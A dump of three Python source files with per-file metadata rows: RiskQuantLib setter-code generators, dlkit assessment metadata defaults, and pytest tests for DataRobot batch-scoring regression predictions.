    code.add_line(f"self.{name} = self._{name}.value")
    code.dedent()
    code.add_line("else:")
    code.indent()
    code.add_line(f"self._{name}.setValue({name}Num)")
    code.add_line(f"self.{name} = self._{name}.value")
    code.dedent()
    code.dedent()
    code.get_globals()
    return code
def buildBaseFunction(variableNameString: str):
    """Build the source of a ``set<Name>`` method for an 'Any' attribute.

    The generated setter wraps the value in a ``RiskQuantLib.Property.base``
    instance on first call and updates that instance on subsequent calls.

    Parameters
    ----------
    variableNameString : str
        The variable name you want to use; it becomes the attribute name
        of the class.

    Returns
    -------
    code : codeBuilder Object
        Holds the generated setter source.
    """
    from RiskQuantLib.Tool.codeBuilderTool import codeBuilder

    name = variableNameString
    setterName = "set" + name[0].capitalize() + name[1:]
    code = codeBuilder(indent=4)
    code.add_line(f"def {setterName}(self, {name}):")
    code.indent()
    code.add_section()
    code.add_line("from RiskQuantLib.Property.base import base")
    code.add_line(f"if not hasattr(self, '_{name}'):")
    code.indent()
    code.add_line(f"self._{name} = base({name})")
    code.add_line(f"self._{name}.setBelongTo(self,'{name}')")
    code.add_line(f"self.{name} = self._{name}.value")
    code.dedent()
    code.add_line("else:")
    code.indent()
    code.add_line(f"self._{name}.setValue({name})")
    code.add_line(f"self.{name} = self._{name}.value")
    code.dedent()
    code.dedent()
    code.get_globals()
    return code
def buildSelfDefinedTypeFunction(variableNameString: str, variableTypeString: str):
    """Build the source of a ``set<Name>`` method for a self-defined type.

    The generated setter imports the type class from
    ``RiskQuantLib.Property.<CapType>.<type>``, wraps the value in it on
    first call, and updates that instance on subsequent calls.

    Parameters
    ----------
    variableNameString : str
        The variable name you want to use; it becomes the attribute name
        of the class.
    variableTypeString : str
        The type name to wrap the value with; usually 'String', 'Number' or
        'Any', but any user-defined type class name works.

    Returns
    -------
    code : codeBuilder Object
        Holds the generated setter source.
    """
    from RiskQuantLib.Tool.codeBuilderTool import codeBuilder

    name = variableNameString
    typeName = variableTypeString
    capTypeName = typeName[0].capitalize() + typeName[1:]
    setterName = "set" + name[0].capitalize() + name[1:]
    code = codeBuilder(indent=4)
    code.add_line(f"def {setterName}(self, {name}):")
    code.indent()
    code.add_section()
    code.add_line(f"from RiskQuantLib.Property.{capTypeName}.{typeName} import {typeName}")
    code.add_line(f"if not hasattr(self, '_{name}'):")
    code.indent()
    code.add_line(f"self._{name} = {typeName}({name})")
    code.add_line(f"self._{name}.setBelongTo(self,'{name}')")
    code.add_line(f"self.{name} = self._{name}.value")
    code.dedent()
    code.add_line("else:")
    code.indent()
    code.add_line(f"self._{name}.setValue({name})")
    code.add_line(f"self.{name} = self._{name}.value")
    code.dedent()
    code.dedent()
    code.get_globals()
    return code
def commitObjectFunctionBuild(codeList: list, sourceFilePath: str):
    """Commit generated set functions to a source file.

    Replaces everything between the '#-<Begin>' and '#-<End>' tags of
    ``sourceFilePath`` with the concatenated source held by the codeBuilder
    objects in ``codeList``.  Prints an error and exits the process with
    code -1 if either tag is missing.

    Parameters
    ----------
    codeList : list
        A list of codeBuilder objects, each exposing a ``python_source``
        attribute with generated setter source.
    sourceFilePath : str
        The file whose tagged region is rewritten.

    Returns
    -------
    None
    """
    sourceCode = "".join(i.python_source for i in codeList)
    with open(sourceFilePath, 'r') as f:
        content = f.read()
    if content.find('#-<Begin>') == -1 or content.find('#-<End>') == -1:
        print("Source file must have a #-<Begin> and #-<End> tag to be built")
        exit(-1)
    former = content.split('#-<Begin>')[0]
    ender = content.split('#-<End>')[-1]
    newContent = former + '#-<Begin>\n' + sourceCode + ' #-<End>\n\t' + ender
    # Fix: open(..., 'w') already truncates the file, so the original's
    # explicit f.truncate() call was redundant and has been dropped.
    with open(sourceFilePath, 'w') as f:
        f.write(newContent.strip(' ').strip('\t\n'))
def buildListSetFunction1D(variableNameString: str, variableType: str = 'Base'):
    """Build the source of a list-level ``set<Name>`` for a 1-D variable.

    The generated setter zips a code series with a value series and assigns
    each value to the matching element of ``self.all``; unmatched elements
    receive a type-dependent default unless ``update`` is requested.

    Parameters
    ----------
    variableNameString : str
        The variable name you used.
    variableType : str
        The variable type you specified ('Str', 'Num' or 'Base').

    Returns
    -------
    code : codeBuilder object
        Holds the generated setter source.
    """
    defaultValueDict = {
        "Str": "''",
        "Num": "np.nan",
        "Base": "np.nan",
    }
    if variableType not in defaultValueDict:
        print("Variable type must be set as 'Str', 'Num' or 'Base'")
        exit(-1)
    else:
        from RiskQuantLib.Tool.codeBuilderTool import codeBuilder

        name = variableNameString
        setterName = "set" + name[0].capitalize() + name[1:]
        default = defaultValueDict[variableType]
        code = codeBuilder(indent=4)
        code.add_line(f"def {setterName}(self,codeSeries,{name}Series,byAttr='code',update=False):")
        code.indent()
        code.add_section()
        code.add_line(f"{name}Dict = dict(zip(codeSeries,{name}Series))")
        code.add_line("if byAttr=='code' and not update:")
        code.indent()
        code.add_line(
            f"[i.{setterName}({name}Dict[i.code]) if i.code in {name}Dict.keys() "
            f"else i.{setterName}({default}) for i in self.all]"
        )
        code.dedent()
        code.add_line("elif not update:")
        code.indent()
        code.add_line(
            f"[i.{setterName}({name}Dict[getattr(i,byAttr)]) if hasattr(i,byAttr) "
            f"and getattr(i,byAttr) in {name}Dict.keys() "
            f"else i.{setterName}({default}) for i in self.all]"
        )
        code.dedent()
        code.add_line("else:")
        code.indent()
        code.add_line(
            f"[i.{setterName}({name}Dict[getattr(i,byAttr)]) if hasattr(i,byAttr) "
            f"and getattr(i,byAttr) in {name}Dict.keys() else None for i in self.all]"
        )
        code.dedent()
        code.dedent()
        code.get_globals()
        return code
def buildListSetFunction2D(variableNameString: str):
    """Build the source of a list-level ``set<Name>`` for a 2-D variable.

    The generated setter takes a DataFrame whose columns identify elements
    of ``self.all`` (e.g. time-series data) and assigns each element its
    column; unmatched elements receive an empty ``pd.Series()`` unless
    ``update`` is requested.

    Parameters
    ----------
    variableNameString : str
        The variable name you used.

    Returns
    -------
    code : codeBuilder object
        Holds the generated setter source.
    """
    from RiskQuantLib.Tool.codeBuilderTool import codeBuilder

    name = variableNameString
    setterName = "set" + name[0].capitalize() + name[1:]
    code = codeBuilder(indent=4)
    code.add_line(f"def {setterName}(self,{name}DataFrame,byAttr='code',update=False):")
    code.indent()
    code.add_section()
    code.add_line("import pandas as pd")
    code.add_line(f"{name}CodeList = {name}DataFrame.columns.to_list()")
    code.add_line("if byAttr=='code' and not update:")
    code.indent()
    code.add_line(
        f"[i.{setterName}({name}DataFrame[i.code]) if hasattr(i,'code') "
        f"and i.code in {name}CodeList "
        f"else i.{setterName}(pd.Series()) for i in self.all]"
    )
    code.dedent()
    code.add_line("elif not update:")
    code.indent()
    code.add_line(
        f"[i.{setterName}({name}DataFrame[getattr(i,byAttr)]) if hasattr(i,byAttr) "
        f"and getattr(i,byAttr) in {name}CodeList "
        f"else i.{setterName}(pd.Series()) for i in self.all]"
    )
    code.dedent()
    code.add_line("else:")
    code.indent()
    code.add_line(
        f"[i.{setterName}({name}DataFrame[getattr(i,byAttr)]) if hasattr(i,byAttr) "
        f"and getattr(i,byAttr) in {name}CodeList else None for i in self.all]"
    )
    code.dedent()
    code.dedent()
    code.get_globals()
    return code
def commitListFunctionBuild(codeList: list, sourceFilePath: str):
    """Commit generated list set functions to a source file.

    Replaces everything between the '#-<Begin>' and '#-<End>' tags of
    ``sourceFilePath`` with the concatenated source held by the codeBuilder
    objects in ``codeList``.  Prints an error and exits the process with
    code -1 if either tag is missing.

    Parameters
    ----------
    codeList : list
        A list of codeBuilder objects, each exposing a ``python_source``
        attribute with generated list setter source.
    sourceFilePath : str
        The file whose tagged region is rewritten.

    Returns
    -------
    None
    """
    sourceCode = "".join(i.python_source for i in codeList)
    with open(sourceFilePath, 'r') as f:
        content = f.read()
    if content.find('#-<Begin>') == -1 or content.find('#-<End>') == -1:
        print("Source file must have a #-<Begin> and #-<End> tag to be built")
        exit(-1)
    former = content.split('#-<Begin>')[0]
    ender = content.split('#-<End>')[-1]
    newContent = former + '#-<Begin>\n' + sourceCode + ' #-<End>\n\t' + ender
    # Fix: open(..., 'w') already truncates the file, so the original's
    # explicit f.truncate() call was redundant and has been dropped.
    with open(sourceFilePath, 'w') as f:
        f.write(newContent.strip(' ').strip('\t\n'))
def clearBuiltFunction(sourceFilePath: str):
    """Clear all generated set functions from a source file.

    Removes everything between the '#-<Begin>' and '#-<End>' tags of
    ``sourceFilePath``, leaving an empty tagged region.  Prints an error and
    exits the process with code -1 if either tag is missing.

    Parameters
    ----------
    sourceFilePath : str
        The file whose tagged region is emptied.

    Returns
    -------
    None
    """
    with open(sourceFilePath, 'r') as f:
        content = f.read()
    if content.find('#-<Begin>') == -1 or content.find('#-<End>') == -1:
        print("Source file must have a #-<Begin> and #-<End> tag to be built")
        exit(-1)
    former = content.split('#-<Begin>')[0]
    ender = content.split('#-<End>')[-1]
    newContent = former + '#-<Begin>\n #-<End>\n\t' + ender
    # Fix: open(..., 'w') already truncates the file, so the original's
    # explicit f.truncate() call was redundant and has been dropped.
    with open(sourceFilePath, 'w') as f:
        f.write(newContent.strip(' ').strip('\t\n'))
| 37.589947
| 348
| 0.673024
| 1,611
| 14,209
| 5.882061
| 0.10987
| 0.038413
| 0.053398
| 0.054031
| 0.855741
| 0.804875
| 0.783347
| 0.780815
| 0.772794
| 0.772794
| 0
| 0.005269
| 0.185164
| 14,209
| 377
| 349
| 37.689655
| 0.81318
| 0.290942
| 0
| 0.761905
| 0
| 0.02381
| 0.220156
| 0.032051
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.059524
| 0
| 0.14881
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84748a9d96a65cdc0a73941ddbfeabe667857a74
| 14,652
|
py
|
Python
|
dlkit/json_/assessment/default_mdata.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/json_/assessment/default_mdata.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/json_/assessment/default_mdata.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""JSON osid metadata configurations for assessment service."""
from .. import types
from ..primitives import Type
# Module-wide default osid Type objects, resolved once at import time from the
# package's registered type data.  Every mdata map below stringifies the first
# three for the languageTypeId / scriptTypeId / formatTypeId fields.
# NOTE(review): DEFAULT_GENUS_TYPE is not referenced in this module's visible
# functions — presumably consumed by importers; confirm before removing.
DEFAULT_LANGUAGE_TYPE = Type(**types.Language().get_type_data("DEFAULT"))
DEFAULT_SCRIPT_TYPE = Type(**types.Script().get_type_data("DEFAULT"))
DEFAULT_FORMAT_TYPE = Type(**types.Format().get_type_data("DEFAULT"))
DEFAULT_GENUS_TYPE = Type(**types.Genus().get_type_data("DEFAULT"))
def get_question_mdata():
    """Return default mdata map for Question"""
    def _display_text(text):
        # DisplayText-style sub-map built from the module default types.
        return {
            'text': text,
            'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
            'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
            'formatTypeId': str(DEFAULT_FORMAT_TYPE),
        }
    # Single optional, writable osid.id.Id element named 'item'.
    return {
        'item': {
            'element_label': _display_text('item'),
            'instructions': _display_text('accepts an osid.id.Id object'),
            'required': False,
            'read_only': False,
            'linked': False,
            'array': False,
            'default_id_values': [''],
            'syntax': 'ID',
            'id_set': [],
        },
    }
def get_answer_mdata():
    """Return default mdata map for Answer"""
    def _display_text(text):
        # DisplayText-style sub-map built from the module default types.
        return {
            'text': text,
            'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
            'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
            'formatTypeId': str(DEFAULT_FORMAT_TYPE),
        }
    # Single optional, writable osid.id.Id element named 'item'.
    return {
        'item': {
            'element_label': _display_text('item'),
            'instructions': _display_text('accepts an osid.id.Id object'),
            'required': False,
            'read_only': False,
            'linked': False,
            'array': False,
            'default_id_values': [''],
            'syntax': 'ID',
            'id_set': [],
        },
    }
def get_item_mdata():
    """Return default mdata map for Item"""
    def _display_text(text):
        # DisplayText-style sub-map built from the module default types.
        return {
            'text': text,
            'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
            'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
            'formatTypeId': str(DEFAULT_FORMAT_TYPE),
        }
    # 'learning_objectives' is multi-valued: array=True, empty default list.
    return {
        'learning_objectives': {
            'element_label': _display_text('learning objectives'),
            'instructions': _display_text('accepts an osid.id.Id[] object'),
            'required': False,
            'read_only': False,
            'linked': False,
            'array': True,
            'default_id_values': [],
            'syntax': 'ID',
            'id_set': [],
        },
    }
def get_assessment_mdata():
    """Return default mdata map for Assessment"""
    def _display_text(text):
        # DisplayText-style sub-map built from the module default types.
        return {
            'text': text,
            'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
            'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
            'formatTypeId': str(DEFAULT_FORMAT_TYPE),
        }
    def _id_field(label):
        # Single optional, writable osid.id.Id element.
        return {
            'element_label': _display_text(label),
            'instructions': _display_text('accepts an osid.id.Id object'),
            'required': False,
            'read_only': False,
            'linked': False,
            'array': False,
            'default_id_values': [''],
            'syntax': 'ID',
            'id_set': [],
        }
    return {
        'rubric': _id_field('rubric'),
        'level': _id_field('level'),
    }
def get_assessment_offered_mdata():
    """Return default mdata map for AssessmentOffered"""
    def _display_text(text):
        # DisplayText-style sub-map built from the module default types.
        return {
            'text': text,
            'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
            'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
            'formatTypeId': str(DEFAULT_FORMAT_TYPE),
        }
    def _base(label, instructions):
        # Flags common to every element in this map.
        return {
            'element_label': _display_text(label),
            'instructions': _display_text(instructions),
            'required': False,
            'read_only': False,
            'linked': False,
            'array': False,
        }
    def _id_field(label):
        field = _base(label, 'accepts an osid.id.Id object')
        field.update({
            'default_id_values': [''],
            'syntax': 'ID',
            'id_set': [],
        })
        return field
    def _datetime_field(label):
        field = _base(label, 'enter a valid datetime object.')
        field.update({
            'default_date_time_values': [None],
            'syntax': 'DATETIME',
            'date_time_set': [],
        })
        return field
    def _boolean_field(label):
        # Boolean elements carry no value-set list.
        field = _base(label, 'enter either true or false.')
        field.update({
            'default_boolean_values': [None],
            'syntax': 'BOOLEAN',
        })
        return field
    duration = _base('duration', 'enter a valid duration object.')
    # NOTE(review): the original stores the duration value set under the key
    # 'date_time_set' (not 'duration_set'); preserved byte-for-byte.
    duration.update({
        'default_duration_values': [None],
        'syntax': 'DURATION',
        'date_time_set': [],
    })
    return {
        'level': _id_field('level'),
        'start_time': _datetime_field('start time'),
        'grade_system': _id_field('grade system'),
        'items_shuffled': _boolean_field('items shuffled'),
        'score_system': _id_field('score system'),
        'deadline': _datetime_field('deadline'),
        'duration': duration,
        'assessment': _id_field('assessment'),
        'items_sequential': _boolean_field('items sequential'),
    }
def get_assessment_taken_mdata():
    """Return default mdata map for AssessmentTaken"""
    def _display_text(text):
        # DisplayText-style sub-map built from the module default types.
        return {
            'text': text,
            'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
            'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
            'formatTypeId': str(DEFAULT_FORMAT_TYPE),
        }
    def _id_field(label):
        # Single optional, writable osid.id.Id element.
        return {
            'element_label': _display_text(label),
            'instructions': _display_text('accepts an osid.id.Id object'),
            'required': False,
            'read_only': False,
            'linked': False,
            'array': False,
            'default_id_values': [''],
            'syntax': 'ID',
            'id_set': [],
        }
    return {
        'assessment_offered': _id_field('assessment offered'),
        'taker': _id_field('taker'),
    }
def get_assessment_section_mdata():
    """Return default mdata map for AssessmentSection"""
    def _display_text(text):
        # DisplayText-style sub-map built from the module default types.
        return {
            'text': text,
            'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
            'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
            'formatTypeId': str(DEFAULT_FORMAT_TYPE),
        }
    # Single optional, writable osid.id.Id element pointing at the taken.
    return {
        'assessment_taken': {
            'element_label': _display_text('assessment taken'),
            'instructions': _display_text('accepts an osid.id.Id object'),
            'required': False,
            'read_only': False,
            'linked': False,
            'array': False,
            'default_id_values': [''],
            'syntax': 'ID',
            'id_set': [],
        },
    }
def get_bank_mdata():
    """Return default mdata map for Bank"""
    # Bank declares no extra elements; the default map is empty.
    return dict()
| 35.563107
| 73
| 0.487374
| 1,165
| 14,652
| 5.84206
| 0.067811
| 0.149868
| 0.097708
| 0.159859
| 0.863503
| 0.852483
| 0.818396
| 0.818396
| 0.818396
| 0.818396
| 0
| 0
| 0.383497
| 14,652
| 411
| 74
| 35.649635
| 0.75346
| 0.025799
| 0
| 0.727273
| 0
| 0
| 0.265462
| 0.008083
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020779
| false
| 0
| 0.005195
| 0
| 0.046753
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84c17ff999ec9c56a9884aa2a89e3c727c39ccec
| 11,119
|
py
|
Python
|
tests/test_regression.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 30
|
2016-03-03T10:29:15.000Z
|
2020-06-03T21:43:11.000Z
|
tests/test_regression.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 164
|
2016-03-03T12:31:22.000Z
|
2020-09-08T13:18:39.000Z
|
tests/test_regression.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 18
|
2016-05-12T13:50:05.000Z
|
2021-06-30T19:42:09.000Z
|
import pytest
from datarobot_batch_scoring.batch_scoring import run_batch_predictions
from utils import PickableMock
from utils import read_logs
def test_regression(live_server, tmpdir, ui, keep_cols=None,
                    in_fixture='tests/fixtures/regression_predict.csv',
                    out_fixture='tests/fixtures/regression_output.csv',
                    fast_mode=False, skip_row_id=False, output_delimiter=None,
                    skip_dialect=False,
                    n_samples=500,
                    max_batch_size=None,
                    expected_ret=None):
    """Score ``in_fixture`` against the live test server and diff the output.

    Also reused as a parameterized helper by the more specific tests below.
    Asserts that ``run_batch_predictions`` returns ``expected_ret`` and, when
    ``out_fixture`` is given, that the produced CSV matches it byte-for-byte.
    """
    # train one model in project
    out = tmpdir.join('out.csv')
    base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
    ret = run_batch_predictions(
        base_url=base_url,
        base_headers={},
        user='username',
        pwd='password',
        api_token=None,
        create_api_token=False,
        pid='56dd9570018e213242dfa93c',
        lid='56dd9570018e213242dfa93e',
        import_id=None,
        n_retry=3,
        concurrent=1,
        resume=False,
        n_samples=n_samples,
        out_file=str(out),
        keep_cols=keep_cols,
        delimiter=None,
        dataset=in_fixture,
        pred_name=None,
        timeout=None,
        ui=ui,
        auto_sample=False,
        fast_mode=fast_mode,
        dry_run=False,
        encoding='',
        skip_dialect=skip_dialect,
        skip_row_id=skip_row_id,
        output_delimiter=output_delimiter,
        max_batch_size=max_batch_size
    )
    assert ret is expected_ret
    if out_fixture:
        actual = out.read_text('utf-8')
        # 'rU' mode was deprecated in Python 3 and removed in 3.11 (raises
        # ValueError); plain 'r' already performs universal-newline handling.
        with open(out_fixture, 'r') as f:
            expected = f.read()
        print(len(actual), len(expected))
        assert actual == expected
def test_regression_rename(live_server, tmpdir):
    """Prediction column renamed via ``pred_name`` (normal mode)."""
    # train one model in project
    out = tmpdir.join('out.csv')
    ui = PickableMock()
    base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
    ret = run_batch_predictions(
        base_url=base_url,
        base_headers={},
        user='username',
        pwd='password',
        api_token=None,
        create_api_token=False,
        pid='56dd9570018e213242dfa93c',
        lid='56dd9570018e213242dfa93e',
        import_id=None,
        n_retry=3,
        concurrent=1,
        resume=False,
        n_samples=10,
        out_file=str(out),
        keep_cols=None,
        delimiter=None,
        dataset='tests/fixtures/regression_predict.csv',
        pred_name='new_name',
        timeout=None,
        ui=ui,
        auto_sample=False,
        fast_mode=False,
        dry_run=False,
        encoding='',
        skip_dialect=False
    )
    assert ret is None
    actual = out.read_text('utf-8')
    # 'rU' mode was removed in Python 3.11; 'r' already handles newlines.
    with open('tests/fixtures/regression_output_rename.csv', 'r') as f:
        assert actual == f.read()
def test_regression_rename_fast(live_server, tmpdir):
    """Prediction column renamed via ``pred_name`` (fast mode)."""
    # train one model in project
    out = tmpdir.join('out.csv')
    ui = PickableMock()
    base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
    ret = run_batch_predictions(
        base_url=base_url,
        base_headers={},
        user='username',
        pwd='password',
        api_token=None,
        create_api_token=False,
        pid='56dd9570018e213242dfa93c',
        lid='56dd9570018e213242dfa93e',
        import_id=None,
        n_retry=3,
        concurrent=1,
        resume=False,
        n_samples=10,
        out_file=str(out),
        keep_cols=None,
        delimiter=None,
        dataset='tests/fixtures/regression_predict.csv',
        pred_name='new_name',
        timeout=None,
        ui=ui,
        auto_sample=False,
        fast_mode=True,
        dry_run=False,
        encoding='',
        skip_dialect=False
    )
    assert ret is None
    actual = out.read_text('utf-8')
    # 'rU' mode was removed in Python 3.11; 'r' already handles newlines.
    with open('tests/fixtures/regression_output_rename.csv', 'r') as f:
        assert actual == f.read()
def check_regression_jp(live_server, tmpdir, fast_mode, gzipped):
    """Use utf8 encoded input data.

    Shared helper for the four *_regression_jp tests: scores the Japanese
    fixture (optionally gzip-compressed, optionally in fast mode) and diffs
    the output against the expected CSV.
    """
    if fast_mode:
        out_fname = 'out_fast.csv'
    else:
        out_fname = 'out.csv'
    out = tmpdir.join(out_fname)
    dataset_suffix = '.gz' if gzipped else ''
    ui = PickableMock()
    base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
    ret = run_batch_predictions(
        base_url=base_url,
        base_headers={},
        user='username',
        pwd='password',
        api_token=None,
        create_api_token=False,
        pid='56dd9570018e213242dfa93c',
        lid='56dd9570018e213242dfa93e',
        import_id=None,
        n_retry=3,
        concurrent=1,
        resume=False,
        n_samples=500,
        out_file=str(out),
        keep_cols=None,
        delimiter=None,
        dataset='tests/fixtures/regression_jp.csv' + dataset_suffix,
        pred_name='new_name',
        timeout=None,
        ui=ui,
        auto_sample=False,
        fast_mode=fast_mode,
        dry_run=False,
        encoding='',
        skip_dialect=False,
        compression=True
    )
    assert ret is None
    actual = out.read_text('utf-8')
    # 'rU' mode was removed in Python 3.11; 'r' already handles newlines.
    with open('tests/fixtures/regression_output_jp.csv', 'r') as f:
        assert actual == f.read()
def test_fast_mode_regression_jp(live_server, tmpdir):
    # Japanese fixture, fast mode, uncompressed input.
    check_regression_jp(live_server, tmpdir, fast_mode=True, gzipped=False)
def test_wo_fast_mode_regression_jp(live_server, tmpdir):
    # Japanese fixture, normal mode, uncompressed input.
    check_regression_jp(live_server, tmpdir, fast_mode=False, gzipped=False)
def test_fast_mode_gzipped_regression_jp(live_server, tmpdir):
    # Japanese fixture, fast mode, gzip-compressed input.
    check_regression_jp(live_server, tmpdir, fast_mode=True, gzipped=True)
def test_wo_fast_mode_gzipped_regression_jp(live_server, tmpdir):
    # Japanese fixture, normal mode, gzip-compressed input.
    check_regression_jp(live_server, tmpdir, fast_mode=False, gzipped=True)
def test_regression_keep_cols(live_server, tmpdir, ui):
    # Keep a single extra input column ('x') in the scored output.
    opts = dict(keep_cols=['x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_x.csv')
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi(live_server, tmpdir, ui):
    # Keep two extra input columns ('y', 'x') in the scored output.
    opts = dict(keep_cols=['y', 'x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx.csv')
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_fast(live_server, tmpdir, ui):
    # Same as test_regression_keep_cols, but in fast mode.
    opts = dict(keep_cols=['x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_x.csv',
                fast_mode=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi_fast(live_server, tmpdir, ui):
    # Same as test_regression_keep_cols_multi, but in fast mode.
    opts = dict(keep_cols=['y', 'x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx.csv',
                fast_mode=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi_fast_max_batch(live_server, tmpdir, ui):
    # A tiny batch-size cap forces the scorer to split the upload.
    opts = dict(keep_cols=['y', 'x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx.csv',
                fast_mode=True,
                max_batch_size=100)
    test_regression(live_server, tmpdir, ui, **opts)
    assert "bytes, splitting" in read_logs()
def test_regression_bad_csv(live_server, tmpdir, ui):
    # Malformed CSV: the run must fail (ret == 1) and log a parse error.
    opts = dict(in_fixture='tests/fixtures/regression_bad.csv',
                out_fixture=None,
                fast_mode=False,
                expected_ret=1)
    test_regression(live_server, tmpdir, ui, **opts)
    assert "Error parsing CSV file after line 1000, error: " in read_logs()
def test_regression_bad2_csv(live_server, tmpdir, monkeypatch, ui):
    # Patch sys.exit so the fast-mode abort surfaces as an assertable error.
    def fake_exit(code):
        raise RuntimeError
    monkeypatch.setattr("sys.exit", fake_exit)
    opts = dict(in_fixture='tests/fixtures/regression_bad2.csv',
                out_fixture=None,
                fast_mode=True,
                expected_ret=1)
    with pytest.raises(RuntimeError):
        test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_wo_row_id(live_server, tmpdir, ui):
    # Keep column 'x' and drop the row_id column from the output.
    opts = dict(keep_cols=['x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_x_rid.csv',
                skip_row_id=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi_wo_row_id(live_server, tmpdir, ui):
    # Keep 'y' and 'x' and drop the row_id column from the output.
    opts = dict(keep_cols=['y', 'x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx_rid.csv',
                skip_row_id=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_fast_wo_row_id(live_server, tmpdir, ui):
    # Fast mode, keep column 'x', no row_id column in the output.
    opts = dict(keep_cols=['x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_x_rid.csv',
                fast_mode=True,
                skip_row_id=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi_fast_wo_row_id(live_server, tmpdir, ui):
    # Fast mode, keep 'y' and 'x', no row_id column in the output.
    opts = dict(keep_cols=['y', 'x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx_rid.csv',
                fast_mode=True,
                skip_row_id=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_fast_wo_row_id(live_server, tmpdir, ui):
    # Fast mode, default columns, no row_id column in the output.
    opts = dict(in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_rid.csv',
                fast_mode=True,
                skip_row_id=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_wo_row_id(live_server, tmpdir, ui):
    # Normal mode, default columns, no row_id column in the output.
    opts = dict(in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_rid.csv',
                fast_mode=False,
                skip_row_id=True)
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi_output(live_server, tmpdir, ui):
    # Keep 'y' and 'x'; write the output with '|' as the field delimiter.
    opts = dict(keep_cols=['y', 'x'],
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx_output.csv',
                output_delimiter='|')
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi_output_skip_dialect(live_server,
                                                        tmpdir, ui):
    # As above, but skip CSV dialect sniffing on the input.
    opts = dict(keep_cols=['y', 'x'],
                skip_dialect=True,
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx_output.csv',
                output_delimiter='|')
    test_regression(live_server, tmpdir, ui, **opts)
def test_regression_keep_cols_multi_skip_dialect(live_server, tmpdir, ui):
    # Keep 'y' and 'x' while skipping CSV dialect sniffing on the input.
    opts = dict(keep_cols=['y', 'x'],
                skip_dialect=True,
                in_fixture='tests/fixtures/regression.csv',
                out_fixture='tests/fixtures/regression_output_yx.csv')
    test_regression(live_server, tmpdir, ui, **opts)
| 32.89645
| 78
| 0.627484
| 1,350
| 11,119
| 4.845185
| 0.102963
| 0.073383
| 0.107629
| 0.08806
| 0.849106
